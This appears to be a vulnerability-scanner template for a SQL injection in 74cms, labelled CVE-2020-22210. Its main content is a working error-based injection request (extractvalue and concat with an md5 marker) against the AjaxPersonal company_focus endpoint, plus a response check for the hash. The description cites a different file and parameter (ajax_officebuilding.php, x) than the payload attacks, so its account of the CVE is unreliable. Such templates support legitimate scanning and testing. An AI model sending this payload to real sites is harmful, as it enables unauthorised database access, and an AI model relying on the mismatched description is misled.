product: 骑士74CMS
vName: 74cms Sql Injection
type: SQL注入
vID:
  - CVE-2020-22210
level: 3
vDesc: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
version: ''
note: ''
search: { }
protocol: http
link: https://nvd.nist.gov/vuln/detail/CVE-2020-22210
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a
    verify:
      logic: and
      check:
        - body:
            value:
              - e807f1fcf82d132f9bb018ca6738a19f
            logic: and
